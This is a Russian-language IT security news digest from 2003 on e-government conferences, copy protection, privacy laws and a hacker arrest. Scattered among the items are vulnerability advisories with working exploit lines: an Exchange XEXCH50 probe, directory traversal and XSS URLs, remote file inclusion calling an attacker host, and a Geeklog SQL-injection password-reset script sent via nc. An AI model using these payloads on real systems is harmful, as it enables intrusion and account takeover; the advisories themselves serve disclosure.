5 ноября текущего года в г. Новосибирске в здании областной администрации состоится региональная конференция Министерства Российской Федерации по связи и информатизации «Электронная Россия — человеку, бизнесу, обществу» для Сибирского федерального округа. Организатор мероприятия — журнал «Сети и системы связи».

Текущий 2003 год был обозначен Минсвязи России как год регионов. Для выявления реального состояния региональной информатизации и определения целей и задач реализации Федеральной целевой программы «Электронная Россия (2002 — 2010)» в субъектах Российской Федерации планом мероприятий министерства было предусмотрено проведение в текущем году семи региональных конференций «Электронная Россия — человеку, бизнесу, обществу» во всех федеральных округах России и итоговой в Москве.

Конференция «Электронная Россия — человеку, бизнесу, обществу» в г. Новосибирске призвана определить приоритетные направления реализации Федеральной целевой программы «Электронная Россия (2002-2010)» на среднесрочную перспективу в Сибирском федеральном округе. Конференцию откроет выступление заместителя министра Российской Федерации по связи и информатизации А. В. Короткова. В пленарной части мероприятия: приветствие полномочного представителя Президента Российской Федерации в Сибирском федеральном округе, выступления заместителя губернатора Новосибирской области Г. А. Сапожникова, первого заместителя Председателя Правительства Республики Алтай Н. М. Тайтакова, заместителя губернатора по промышленности, транспорту и связи Администрации Кемеровской области А. И. Копытова, генерального директора ОАО «Сибирьтелеком» Н. И. Никулина.

Программой конференции также предусмотрены доклады представителей администраций, министерств и ведомств, научных и образовательных организаций субъектов Сибирского федерального округа.

В рамках конференции состоится круглый стол «Сибирская индустрия информационных систем», участники которого обсудят перспективы реализации инфраструктурных решений ФЦП «Электронная Россия» в регионах Сибирского федерального округа, определят организационные, методические и информационные механизмы взаимодействия субъектов сибирской ИТ-индустрии с федеральной целевой программой.

Информацию о конференции можно получить по телефонам редакции: 095-234-5321, 974-7110 (факс) или на сайте: http://ccc.ru/conference. Участие в конференции для государственных служащих — бесплатное.

Компания Protection Technology выпустила в свет новую систему защиты ПО от копирования. StarForce Soft 3.0. Продукт разработан как универсальная защита корпоративного ПО, сетевых версий игр, используемых в клубах и программ, распространяемых через интернет. Технология разрабатывалась как альтернатива классической защите программного обеспечения, распространяемого на на СD/DVD-ROM/CD-R. StarForce Soft 3.0 делает возможным запуск приложения без постоянного наличия лицензионного диска в приводе и открывает новые возможности для защиты ПО. Оно может распространяться на любом носителе или через интернет, но запускается только после прохождения пользователем процесса активации через службу поддержки издателя. Защита приложения привязывается к аппаратной части компьютера и никаким образом не проявляет себя при запуске самого приложения.

Схема использования StarForce Soft 3.0 напоминает работу лицензионной системы и выполняет функцию активации использования защищенного ПО (Electronic License Activation). Сама процедура защиты приложения занимает от пятнадцати минут до трех часов: система позволяет осуществить усиленную защиту отдельных функций уже готовых выполняемых файлов, динамических библиотек приложения и данных непосредственно из программного интерфейса установки защиты Protection Wizard. Со стороны пользователя остается только установить защищенное приложение и пройти регистрацию в службе поддержки издателя, по результатам которого и на основе аппаратного кода выдается ключ активации запуска приложения. В то же время издатель получает информацию о пользователях своего ПО и контролирует процесс его использования. Продукт изначально развивался как защита от копирования сетевых версий компьютерных игр, используемых в игровых клубах: неудобно держать диски со всеми "некопируемыми" играми в приводах всех компьютеров в клубе. Генератор кода активации, установленный у клиента (к примеру, на компьютере сисадмина), решит проблему выдачи прав на экспуатацию программы любому числу сотрудников компании. Небольшие производители ПО также смогут защитить свои продукты, не тратясь на коробочные версии и разместив программы в интернете. Применение систем защиты от копирования на оптических носителях до сих пор вызывало негативные эмоции со стороны конечных пользователей, для которых отпала необходимость хранить лицензионный диск и использовать его для каждого запуска защищенного приложения. Другим преимуществом стала большая совместимость приложений с аппаратной и программной компонентами, что делает защиту практически невидимой для пользователя.

Компания Microsoft получила от американского патентного ведомства патент за номером 6,632,248 в области интернет-технологий. На этот раз компания изобрела способ показа пользователю индивидуально настроенных веб-страниц с помощью специальных идентификаторов, хранящихся на клиентском компьютере.

В описании изобретения приводится следующая его характеристика: при первом посещении сайта пользователь настраивает вид страницы. Эта информация запоминается сервером, а на клиентский компьютер записывается уникальный идентификатор. При следующем посещении сервер считывает идентификатор и выводит страницу в соответствии с сохраненными настройками. По сути, это тот же принцип, что используется при идентификации пользователей с помощью файлов cookie. Противники софтверных патентов уже назвали новый патент Microsoft еще одним доказательством в пользу абсурдности патентования программ.

Описание: Выпущен Poc код, позволяющий определить, уязвим ли Exchange сервер к недавно обнаруженному переполнению буфера.

Цель эксплоита: Microsoft Exchange 2000/XP

Воздействие эксплоита: Сканнер

Описание уязвимости: http://www.securitylab.ru/40832.html

эксплоит:

EHLO X\r\n
MAIL FROM: Administrator\r\n
RCPT TO: Administrator\r\n
XEXCH50 2 2\r\n

Финские законотворцы предложили на рассмотрение парламенту новый закон, согласно которому родителям разрешается следить за передвижениями своих детей с помощью их мобильных телефонов – даже без согласия самих детей. Как отмечают обозреватели, если подобный закон будет принят, другие страны Евросоюза могут последовать примеру северного соседа и ввести новые критерии подхода к вопросу о неприкосновенности частной жизни и использованию мобильников.

Предложенный финскими законодателями пункт закона о неприкосновенности частной жизни при электронных коммуникациях может еще быть изменен в ходе парламентских слушаний, несмотря на то, что коалиционное правительство страны единогласно приняло его на прошлой неделе.

Скорее всего, предложенный пункт будет вынесен на рассмотрение парламента в начале ноября. Пока же, по словам официальных лиц правительства и политиков, слишком рано говорить о том, будет он принят или нет.

"Приблизительно такие же законы в ближайшем будущем вступят в силу на территории Евросоюза", - заявил Юхапекка Ристола (Juhapekka Ristola) из финского министерства транспорта и коммуникаций. По его словам, другие страны могут последовать примеру Финляндии – родины крупнейшего в мире производителя мобильников, компании Nokia, - потому что предлагаемый законопроект основан на директиве Евросоюза о неприкосновенности частной жизни и электронных коммуникациях. К тому же, немаловажным здесь является и тот факт, что Финляндия названа страной с самым высоким уровнем развития инфокоммуникационных технологий, согласно отчету Global Information Technology Report за 2002-2003 гг.

Согласно законопроекту, за лицами, достигшими 15 лет или старше, можно будет следить только по их собственному согласию, но за местонахождением ребенка до 15 лет можно будет следить с согласия его родителей или опекунов. В чрезвычайных ситуациях за людьми можно будет по-прежнему следить без их согласия, независимо от возраста.

Два ведущих финских оператора сотовой связи, TeliaSonera и Elisa, уже предлагают воспользоваться услугой позиционирования, которая позволяет определить местонахождение пользователя мобильного телефона после анализа сигнала ближайшей к нему базовой станции. TeliaSonera, например, предлагает определить местоположение с точностью от 100 метров в густонаселенных районах до 20 км в менее населенных.

Компания Enterasys Networks анонсировала новую технологию Secure Networks ("Защищенные сети"), объединяющую новейшие средства обеспечения информационной безопасности и современные сетевые технологии. Новая технология позволяет существенно улучшить эффективность и масштабируемость современных корпоративных сетей и распределить средства защиты по всем элементам сети, в отличие от существовавших до сих пор средств "точечной защиты". Технология Secure Networks позволяет заказчикам динамично реагировать на возникающие угрозы, защищать важные информационные ресурсы, не теряя при этом в эффективности работы сети, при невысоких общих затратах. Составной частью Secure Networks является технология распределенного брандмауэра, предполагающая централизованное управление политиками, которое позволяет заказчикам оперативно и гибко определять права пользователей сети в части использования приложений и доступа к информационным ресурсам организации. Используя развитую логику технологии User Personalized Networking ("Персонализированная под пользователя сеть"), интеллектуальные коммутаторы аутентифицируют каждого пытающегося подключиться к сети и предоставляют возможность динамического принудительного применения сетевых политик и политик безопасности по результатам этой аутентификации, вне зависимости от точки подключения.

Компания Cognitive Technologies заключила контракт со страховой компанией "Сибирь" о внедрении комплексной системы электронного документооборота, реализованной на основе базовых технологий "Евфрат-Документооборот" и Cognitive Forms. Система будет установлена в департаменте урегулирования убытков СК "Сибирь". В результате реализации проекта предполагается перейти на безбумажный документооборот внутри процесса урегулирования страховых убытков, обеспечить комплексный контроль за исполнением регламента принятого в департаменте, а также значительно сократить производственные издержки. Планируется, что ежемесячно через систему будет проходить около 1,5 тыс. страховых дел. В системе предусмотрено использование средств шифрования и криптозащиты данных. Кроме того, ее программный комплекс включает подсистему автоматизированного ввода форм документов, которая предназначена для потоковой обработки и ввода в систему заявлений на оформление страхового полиса, заявлений о наступлении страхового случая и т. п. Проект внедрения комплексной системы электронного документооборота в СК "Сибирь" будет завершен к середине ноября.

Минэкономразвития России разработало законопроект о служебной тайне и порядке обращения с конфиденциальной информацией в государственных органах и органах местного самоуправления, сообщил первый зам главы Минэкономразвития Михаил Дмитриев на "круглом столе" об информационной открытости органов власти в понедельник.

По его словам, законопроект о служебной тайне разработан в дополнение к закону об обеспечении доступа к информации о деятельности органов власти, который, в свою очередь одобрен всеми заинтересованными министерствами и ведомствами и находится на согласовании в администрации президента России.

Дмитриев отметил, что законопроект о служебной тайне разрабатывался с учетом законодательства ЕС и включает в себя стандартные требования, прописанные в европейском праве по отнесению той или иной информации к служебной тайне или признанию ее конфиденциальной.

Он напомнил, что, согласно законопроекту об обеспечении доступа к информации о деятельности органов власти, вся информация, которая не является конфиденциальной или не может быть отнесена к служебной или государственной тайне, должна находиться в свободном доступе или предоставляться по запросу граждан или организаций.

Согласно разработанному законопроекту, к служебной тайне предполагается относить, в частности, сведения, передаваемые в органы власти физическими лицами и организациями на условиях сохранения их конфиденциальности; сведения о деятельности государственных органов и органов местного самоуправления, отнесенные к конфиденциальной информации в соответствии с федеральными законами; сведения, связанные с условиями для поставки товаров для государственных нужд, предложенными организациями, которые допущены к участию в конкурсах на поставку товаров для госнужд.

Контроль за обеспечением защиты служебной тайны и раскрытием сведений, отнесенных к служебной тайне, согласно законопроекту, будет осуществлять федеральная комиссия по информации.

Дмитриев отметил, что сроки внесения законопроекта в правительство не установлены, но в силу приоритетности он будет внесен в ближайшее время.

В настоящий момент, Минэкономразвития собирает отзывы экспертов и общественных организаций к этому законопроекту и в ближайшее время направит его на согласование в заинтересованные министерства и ведомства.

Специализированная экспозиции "Информационная безопасность" традиционно проходит в рамках Международного форума "Технологии безопасности" (Москва, ВВЦ, Пав. 57, 3-6 февраля 2004 г.)

Экспозиция "Информационная безопасность" является уникальной по своей тематике и составу участников, объединяет практически всех основных субъектов и пользователей рынка информационной безопасности. В ней традиционно принимают участие такие ведущие российские компании этого сектора, как "МАСКОМ", "Ново", "Нелк", "Сюртель", "Смерш Техникс", "Анна", "Защита Информации", "Set-1" и другие.

В рамках деловой программы Международного форума "Технологии безопасности" проходит тематическая конференция "Защита информации: актуальные проблемы". Организатор - ООО ЦБИ "МАСКОМ". Экспоненты приглашаются к участию в качестве выступающих. В настоящее время планируется проведение конференции по банковской безопасности. Также предоставляется возможность организации и проведения своих собственных деловых мероприятий. Все материалы деловой программы публикуются в специальном издании и размещаются на сайте.

Тематические разделы экспозиции: Скремблеры, Генераторы помех, Индикаторы излучений, Поисковое оборудование, Специальная полиграфия, голография, Системы защиты компьютерной информации, Криптография, Защита компьютерных сетей, Антивирусные программы, Механическая защита компьютеров, Сетевые адаптеры, Источники бесперебойного питания и т.д.

Для участников экспозиции "Информационная безопасность" до 31 октября 2003 г. действует специальное предложение по ценам. По вопросам бронирования площадей в разделе "Информационная безопасность" - обращаться в Дирекцию выставки. Количество выставочной площади по специальным ценам ограничено.

28-летняя американка Энджел Ли (Angel Lee) из города Эль Мираж, штат Аризона, была на прошлой неделе приговорена к 60 дням домашнего ареста за незаконное чтение писем, посланных по электронной почте бывшей жене своего мужа. По словам судьи, приговор был вынесен в назидание другим любителям читать чужую почту.

"Неприкосновенность частной жизни – все еще охраняемая ценность", - заявил окружной судья Ричард Мэтш (Richard Matsch), оглашая приговор. По его мнению, подобная мера заставит любителей заглядывать в чужие ящики электронной почты задуматься, прежде чем предаваться этому занятию. Как передает Associated Press, еще в марте этого года Ли признала себя виновной в прочтении по меньшей мере 215 сообщений электронной почты, посланных в прошлом году бывшей жене своего мужа, Дуонглэдд Рэмсей (Duongladde Ramsay). Как заявило обвинение, Ли обманным путем узнала логин и пароль к почтовому ящику Рэмсей.

По словам судьи Мэтша, в письмах шла речь о довольно неприглядных семейных разбирательствах, связанных с разводом и вопросами, касающимися общих детей. Вынося приговор, судья отметил, что рассматривал возможность отправить подсудимую в тюрьму, но затем передумал, решив, что ей лучше побыть дома со своими маленькими детьми.

По словам пострадавшей Рэмсей, то, что сделала Ли, равносильно тому, как если бы она вломилась в ее дом и прочитала ее дневник. "Я на самом деле хочу извиниться за то, что я сделала, - сказала Ли, обращаясь к судье. – У Рэмсей есть все основания чувствовать себя подобным образом".

Напомним, что несанкционированный перехват чужих электронных писем – даже если они посланы собственным супругом или адресованы ему – в США запрещен по закону. В то же время, если у супруга нет законных оснований взламывать защищенный паролем ПК своей половины, то он может вполне легально читать всю почту, полученную на совместно используемом компьютере.

Две компании завершили первый этап проекта по портированию антивирусного ПО компьютерного типа на мобильные телефоны завтрашнего дня.

Компания Network Associates, которая производит антивирусные программы McAfee, объявила о своем сотрудничестве с NTT DoCoMo в области создания антивирусного механизма для мобильных телефонов. Цель этой разработки — отвести угрозу злонамеренного кода от все более развитых мобильных устройств.

Network Associates подготовила рабочий прототип своего антивирусного ПО McAfee для мобильных телефонов DoCoMo. Обе компании работали над ним с мая, хотя до сих пор не объявляли о партнерстве.

Вирусы еще не стали серьезной проблемой для мобильных телефонов, которые гораздо проще ПК и функционируют в закрытых сетях. Однако аналитики утверждают, что это лишь дело времени. DoCoMo намерена использовать технологию, разработанную Network Associates, для защиты будущих версий телефонов поколений 2.5G и 3G. Крупнейший в мире оператор мобильной связи, обслуживающий 47 млн абонентов, компания DoCoMo наиболее широко известна своей сетью i-mode, поддерживающей передачу данных на мобильные трубки.

Network Associates и DoCoMo планируют ввести антивирусную технологию в устройства DoCoMo к концу будущего года. Компании намерены передать некоторые свои технологии организации Open Mobile Alliance для использования в качестве промышленного стандарта.

По мнению Network Associates, вероятность появления вирусов в мобильных телефонах повышается с переходом операторов на стандартизованные ОС, такие как Symbian OS, которую используют Nokia и другие, или Microsoft Smartphone. Использование IP-сетей вместо современных закрытых сетей также создает риски для безопасности.

«Мы ожидаем появления вредоносного кода в ближайшие пару лет, — говорит специалист Network Associates по безопасности мобильной связи Сэл Виверос. — Начинается стандартизация операционных систем... и стандартизация сетей. С переходом на 3G мы будем говорить по широкополосным каналам. Все это создает условия для появления вредоносного кода».

Компания также работает с Symbian над антивирусным ПО для Symbian-устройств и уже выпустила (через Dell) антивирус для карманных компьютеров Pocket PC на базе Windows CE.

Правовое регулирование мониторинга телекоммуникаций является необходимым в связи с требованиями подписанной Украиной Конвенции о киберпреступности и соответствующей директивы Евросоюза. Так считают в Службе безопасности Украины (СБУ). Как разъясняют в пресс-службе СБУ, новый законопроект "О мониторинге телекоммуникаций" не расширяет полномочий правоохранительных органов. Он предусматривает технические, организационные и режимные мероприятия для обеспечения мониторинга на законных основаниях, что позволит создать законодательный механизм, который будет определять технологию работы правоохранительных органов по снятию информации с каналов сетей телекоммуникаций для предотвращения или раскрытия преступлений, в частности, киберпреступлний и терроризма, а также для реализации эффективного взаимодействия с правоохранительными органами иностранных государств по вопросам противодействия и борьбы с киберпреступностью.

Мониторинг телекоммуникаций, осуществляемый на законных основаниях, - это требование времени, обусловленное сложной криминогенной ситуацией, которая сложилась в мире. Современное развитие информационных технологий и вхождение Украины в международное информационное пространство требуют адекватного правового регулирования и обеспечения защиты интересов граждан, общества и государства в информационной сфере. Особую актуальность эта проблема приобретает с учетом роста киберпреступности и использования информационных технологий террористическими группировками.
11

Программа: Oracle Database 9.2.0.4.0

Опасность: Средняя

Наличие эксплоита: Да

Описание: Переполнение буфера обнаружено в базе данных Oracle. Локальный пользователь может выполнить произвольный код с поднятыми привилегиями на целевой системе.

Локальный пользователь может представить чрезмерно длинную argv[1] строку к базе данных, чтобы переполнить буфер и выполнить произвольный код с привилегиями пользователя 'oracle'. Уязвимы следующие программы:

      /database/u00/app/oracle/product/9.2.0.1.0/bin/oracle
      /database/u00/app/oracle/product/9.2.0.1.0/bin/oracleO

Пример/Эксплоит: http://www.securitylab.ru/_exploits/oracle_owanage.c.txt

URL производителя:http://www.oracle.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

В Финляндии предложен законопроект, по которому родители получат возможность посредством мобильной связи следить за передвижением своих детей даже без их согласия на это.

Финский парламент, вероятнее всего, начнет обсуждение законопроекта в начале ноября, однако официальные лица государства и политические лидеры считают, что еще рано предсказывать, когда такой закон вступит в силу. Как заявил Юхапекка Ристола, официальный представитель министерства транспорта и связи Финляндии, подобный закон может быть принят и на территории всего Европейского Союза в ближайшем будущем.

Согласно готовящемуся законопроекту, для наблюдения за лицами в возрасте от 15 лет и старше необходимо их согласие. Что касается детей младше пятнадцатилетнего возраста, то согласие на удаленный контроль за ними может исходить от их родителей или опекунов. В чрезвычайных ситуациях наблюдение может устанавливаться и без согласия самого человека, вне зависимости от его возраста.

В настоящее время два крупнейших оператора сотовой связи Финляндии, компании TeliaSonera и Elisa предоставляют услугу определения местонахождения абонента по базовой станции, к которой тот располагается ближе всего.

Программа: byteHoard 0.7 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в byteHoard. Злонамеренный пользователь может получить доступ к чувствительной информации. Проблема связанна с недостаточной проверкой параметра "infolder" в сценарии "index.php". В результате злонамеренный пользователь может получить доступ к данным вне wwwroot каталога с привилегиями Web сервера, используя символы обхода каталога "./". Пример/Эксплоит: http://victim.com/bytehoard/index.php?infolder=././././ URL производителя:http://bytehoard.sourceforge.net/index.php?about Решение: Установите обновленную (0.71) версию программы: http://prdownloads.sourceforge.net/bytehoard/bytehoard_point_seven_one.zip?download

ByteHoard Directory Traversal Vulnerability

Программа: Vivisimo Clustering Engine Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Vivisimo Clustering Engine. Удаленный пользователь может выполнить XSS нападение. Уязвимость обнаружена в поисковом сценарии. Пример/Эксплоит: http://[target]/search?query=<script>alert("Hello" )</script><script>alert("goodbye")</script> URL производителя: http://vivisimo.com/products/Clustering_Engine/Introduction.html Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Execution of arbitrary code via network

Программа: GrimNET e-shop Опасность: высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в корейской системе электронных магазинов GrimNET e-shop. Удаленный пользователь может выполнить произвольный PHP код на уязвимой системе. Сценарии shop.html и notice.html включают любой файл, указанный в переменной incstr без какой-бы то ни было проверки ее содержимого. Пример/Эксплоит: http://[victim]/shop.html?incstr=http://[hacker]/myfile.php http://[victim]/notice.html?incstr=http://[hacker]/myfile.php Примечание: если на хосте http://[hacker]/ установлен php, то сценарию (в нашем случае myfile.php) надо дать иное расширение, например myfile.inc. Уязвимость обнаружил NivaX (nivax@web-hack.ru), http://www.web-hack.ru URL производителя:http://www.grimnet.net/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Всего через три дня после того, как вице-президент Microsoft, ответственный за Microsoft.com и Windows Update, сообщил тысячам делегатов конференции во Флориде, что Service Pack 2 для Windows XP будет готов к концу 2003 года, компания взяла свои слова обратно и сказала, что в этом году заказчики получат лишь бета-версию.

Ричард Каплан, вице-президент Microsoft по контенту и доставке продуктов, сделал свое заявление в начале прошлой недели перед аудиторией примерно из 2000 человек на конференции Citrix iForum, когда объяснял, почему он уверен, что Windows Server 2003 является наилучшей и самой быстродействующей платформой для пользователей Citrix MetaFrame. Каплан сообщил, что в рамках пересмотра методов работы с секьюрити-патчами компания решила выпускать их раз в месяц и что «новая версия Windows, называемая Windows XP SP2», появится к концу года.

Однако в пятницу Microsoft распространила заявление, в котором говорится, что в этом году выйдет лишь бета-версия сервисного пакета, а полную версию планируется выпустить в середине 2004 года. «Цикл разработки находится еще на слишком ранней стадии, чтобы указать более точный срок выпуска», — говорится в заявлении компании.

Первоначально сервисный пакет планировалось выпустить в этом году, но в августе Microsoft выложила на свой веб-сайт график, из которого следовало, что выпуск задерживается. Microsoft изменила также график выпуска Longhorn, следующей версии Windows XP. Longhorn планируется выпустить в конце 2005 или начале 2006 года, хотя руководство компании, включая Билла Гейтса, признает, что это, вероятно, произойдет позднее. В начале октября на конференции для важнейших партнеров несколько руководителей Microsoft сказали, что ПО будет разрабатываться в течение трех лет, а это предполагает перенос срока выпуска на 2006 год.

Выход Longhorn важен тем, что с этой платформой нового поколения связано несколько других флагманских продуктов, таких как Visual Studio, Office 12 и Longhorn Server.

Программа: Geeklog 1.3.8 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в Geeklog. Злонамеренный пользователь может манипулировать SQL запросами. Злонамеренный пользователь может манипулировать параметром "reqid" при обновлении пароля, чтобы изменить пароль произвольного пользователя. Пример/Эксплоит: #!/bin/sh echo "POST /path/to/gl/users.php HTTP/1.0 Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1& " | nc localhost 80 URL производителя:http://www.geeklog.net Решение: Обновите программу до 1.3.8-1sr2: http://www.geeklog.net/filemgmt/visit.php?lid=254

Geeklog

Программа: cpCommerce 0.05f

Опасность: Критическая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в cpCommerce. Удаленный пользователь может скомпрометировать удаленную систему. Пример/Эксплоит:

http://[victim]/[path_of_cpcommerce]/_functions.php?prefix=http://[malicious_site]/index, 
где
http://[malicious_site]/index_config.php и "http://[malicious_site]/index_gateways.php

URL производителя:http://cpcommerce.org/

Решение: Для устранения уязвимости, выполните соответствующие инструкции: http://cpcommerce.org/#fixes

17-летний хакер взломал сервер RO Online, онлайновой игры от компании Gameflier, подконтрольной Soft-World, изменил базу данных игры и, продавая данные, присвоил 120 тыс. юаней ($14,496).

"Действия хакера - студента одного из шанхайских вузов - нанесли урон репутации и доходам фирмы, а также лишили остальных игроков удовольствия", - заявил Ли Минчжоу. Полиция задержала хакера, игра налажена.

RO Online весьма популярна в Китае. С момента ее запуска в январе 2003 года зафиксировано 3,7 млн. обращений к серверу игры. В пиковые часы количество одновременно играющих достигает 130 тыс.чел.